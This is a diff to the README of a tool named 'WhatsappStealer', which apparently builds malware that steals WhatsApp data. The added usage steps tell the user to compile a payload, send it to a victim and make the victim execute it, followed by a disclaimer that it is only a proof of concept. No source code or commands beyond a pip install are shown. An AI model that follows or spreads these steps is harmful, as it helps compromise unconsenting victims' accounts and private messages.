xpierroz/WhatsappStealer/README.md

 ## How to use 📖

-Just download this repository
+* Just download this repository
-Make sure you have python and the requirements installed (pip install -r requirements.txt) Start main.py
+* Make sure you have python and the requirements installed (pip install -r requirements.txt)
+* Start main.py
+* Create a payload (the program will ask you if you wanna compile the payload)
+* Send the payload to your victim and make it execute it
+* Don't forget this is a POC and that this shouldn't be used for malicious purposes, i'm not responsible for your actions

 ## How it works 🤔